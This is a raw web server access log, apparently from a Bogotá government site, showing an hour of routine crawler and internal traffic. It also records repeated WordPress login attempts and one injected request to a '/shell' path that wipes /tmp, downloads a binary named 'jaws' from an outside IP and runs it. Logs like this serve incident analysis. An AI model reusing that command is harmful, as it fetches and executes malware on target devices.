40.77.167.69 - - [06/Nov/2022:06:47:19 -0500] "GET /distrito-alcanza-ya-15-acuerdos-de-conservacion-por-174-02-hectareas-para-consolidar-varios-ecosistemas-estrategicos-de-bogota.html HTTP/1.1" 200 1061
172.22.2.4 - - [06/Nov/2022:06:47:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.141.53 - - [06/Nov/2022:06:49:28 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2016/ HTTP/1.1" 200 13279
216.245.221.92 - - [06/Nov/2022:06:49:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:48:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
40.77.167.102 - - [06/Nov/2022:06:50:12 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:06:51:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
185.119.81.101 - - [06/Nov/2022:06:53:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [06/Nov/2022:06:53:43 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
216.245.221.92 - - [06/Nov/2022:06:54:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:53:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:54:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
201.245.192.253 - - [06/Nov/2022:06:56:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [06/Nov/2022:06:59:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:59:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
128.14.133.58 - - [06/Nov/2022:07:01:06 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Nov/2022:07:00:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
201.245.192.253 - - [06/Nov/2022:07:01:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:07:03:35 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
172.22.2.4 - - [06/Nov/2022:07:03:49 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [06/Nov/2022:07:03:54 -0500] "GET /BLA/boletinlegal/js/ajax_doctrina.js HTTP/1.1" 200 772
172.22.2.4 - - [06/Nov/2022:07:03:54 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [06/Nov/2022:07:03:59 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [06/Nov/2022:07:03:59 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
216.245.221.92 - - [06/Nov/2022:07:04:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:07:05:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:07:06:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
185.119.81.101 - - [06/Nov/2022:07:07:09 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [06/Nov/2022:07:07:10 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Nov/2022:07:05:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
185.119.81.103 - - [06/Nov/2022:07:09:21 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [06/Nov/2022:07:09:22 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [06/Nov/2022:07:09:58 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:07:11:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
207.46.13.162 - - [06/Nov/2022:07:11:58 -0500] "GET /BLA/resoluciones/00000036.tif HTTP/1.1" 404 1018
172.22.2.4 - - [06/Nov/2022:07:10:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:07:12:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
94.232.47.167 - - [06/Nov/2022:07:13:14 -0500] "\x03" 400 226
94.232.47.167 - - [06/Nov/2022:07:13:15 -0500] "\x03" 400 226
102.129.145.13 - - [06/Nov/2022:07:13:27 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
172.22.2.4 - - [06/Nov/2022:07:11:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54823
216.245.221.92 - - [06/Nov/2022:07:14:58 -0500] "HEAD / HTTP/1.1" 200 -
20.106.28.16 - - [06/Nov/2022:07:15:03 -0500] "GET /galeria/galeria/fotos/diaSC9Peq.jpg HTTP/1.1" 200 10104
201.245.192.253 - - [06/Nov/2022:07:16:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:07:16:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:07:17:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
216.245.221.92 - - [06/Nov/2022:07:19:58 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.100 - - [06/Nov/2022:07:21:07 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Nov/2022:07:21:08 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [06/Nov/2022:07:21:09 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [06/Nov/2022:07:21:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42962
201.245.192.253 - - [06/Nov/2022:07:21:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44014
201.245.192.253 - - [06/Nov/2022:07:21:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
66.249.73.127 - - [06/Nov/2022:07:23:52 -0500] "-" 408 -
172.22.2.4 - - [06/Nov/2022:07:22:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Nov/2022:07:24:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:07:23:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
60.175.91.107 - - [06/Nov/2022:07:25:09 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
201.245.192.253 - - [06/Nov/2022:07:26:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
20.106.28.16 - - [06/Nov/2022:07:29:44 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
216.245.221.92 - - [06/Nov/2022:07:29:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:07:28:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:07:29:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [06/Nov/2022:07:31:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42962
201.245.192.253 - - [06/Nov/2022:07:31:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44014
201.245.192.253 - - [06/Nov/2022:07:31:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [06/Nov/2022:07:34:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:07:34:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Nov/2022:07:36:34 -0500] "-" 408 -
185.119.81.101 - - [06/Nov/2022:07:36:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [06/Nov/2022:07:36:43 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [06/Nov/2022:07:36:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:07:35:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [06/Nov/2022:07:39:58 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.103 - - [06/Nov/2022:07:40:57 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [06/Nov/2022:07:40:57 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [06/Nov/2022:07:40:58 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
185.119.81.101 - - [06/Nov/2022:07:40:58 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [06/Nov/2022:07:41:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42962
201.245.192.253 - - [06/Nov/2022:07:41:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44014
201.245.192.253 - - [06/Nov/2022:07:41:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:07:40:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:07:40:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [06/Nov/2022:07:44:58 -0500] "HEAD / HTTP/1.1" 200 -
103.149.192.190 - - [06/Nov/2022:07:45:44 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [06/Nov/2022:07:46:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:07:45:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:07:46:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
172.22.2.4 - - [06/Nov/2022:07:49:50 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx? HTTP/1.1" 200 26698
